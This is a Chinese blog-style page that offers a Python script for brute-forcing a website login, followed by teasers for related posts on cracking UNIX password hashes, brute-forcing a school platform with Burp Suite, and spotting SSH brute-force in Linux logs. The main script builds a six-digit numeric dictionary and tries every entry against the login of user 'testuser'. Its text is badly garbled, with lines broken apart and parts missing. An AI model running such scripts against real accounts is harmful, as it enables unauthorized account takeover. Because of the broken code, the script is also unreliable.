python 暴力破解密碼指令碼
以下,僅為個人測試**,環境也是測試環境,暴力破解原理都是一樣的,
假設要暴力破解登陸**www.a.com 使用者 testuser的密碼,
首先,該**登陸的驗證要支援 無限次的密碼嘗試
假設testuser 的密碼為 6位的純數字
1:先長成 6位純數字密碼字典
importospds=
rg=range(0,10)
for first in
rg:
for second in
rg:
for three in
rg:
for four in
rg:
for five in
rg:
for six in
rg: num= "
%s%s%s%s%s%s
"%(first,second,three,four,five,six)
file_object = open('
/users/teso/desktop/pwdnum6.txt
', 'w'
)file_object.writelines([
'%s%s
' % (x,os.linesep) for x in
pds])
file_object.close( )
上面指令碼會在桌面生成 6位數字的所有密碼字典 pwdnum6.txt
2: 研究 www.a.com **的登陸驗證機制,指令碼暴力破解密碼
importurllib,urllib2,htmlparser
#解析網頁的爬蟲
class
oaparser(htmlparser.htmlparser):
def__init__
(self):
htmlparser.htmlparser.
__init__
(self)
self.pd=
defhandle_data(self, data):
#print "encountered some data :", data #
暴力破解指令碼
if"使用者登入
"in parse.pd:#
這裡是對應**的密碼驗證邏輯
'嘗試密碼
',pwd,'
登陸失敗
'isfind =false
else
:
print user,'
登陸成功
','password =
',pwd
isfind=true
del(parse)
return
isfind
user='
testuser'#
password=['1','12','123','1234','12345','123456','12345678']
fpath='
/users/teso/desktop/pwdnum6.txt
'pfile=open(fpath,'r'
)for onepwd in
pfile.readlines():
if trylogin(user, onepwd[:6]):
break;
流程大致如此,自行研究著玩了
Linux防止暴力破解密碼指令碼
1.認識記錄linux記錄安全的日誌 root testpm cd var log root testpm log ls grep secure secure 2.該日誌的內容檢視 root testpm log tail f secure 表示ssh身份驗證失敗 aug 29 23 35 03 t...
Python 暴力破解UNIX密碼指令碼
coding utf 8 暴力破解unix的密碼,需要輸入字典檔案和unix的密碼檔案 遍歷整個字典,試圖用常用的鹽值來匹配破解雜湊密碼 import crypt def testpass cryptpass salt cryptpass 0 2 dictfile open dictionary.t...
burpsuite實戰 暴力破解密碼
某日閒來無事抓包,發現了學校某個管理平台沒有驗證碼的登陸頁面,尤其上面還寫著初始密碼,本著圍觀學姐 的心理,就開始拿burpsuite搞了一波爆破。下面簡述要點。當然,本文章內沒有學姐 想看 的可以關網頁了 0x01基本過程 burpsuite設chrome 通過chrome訪問站點 獲取資料報 分...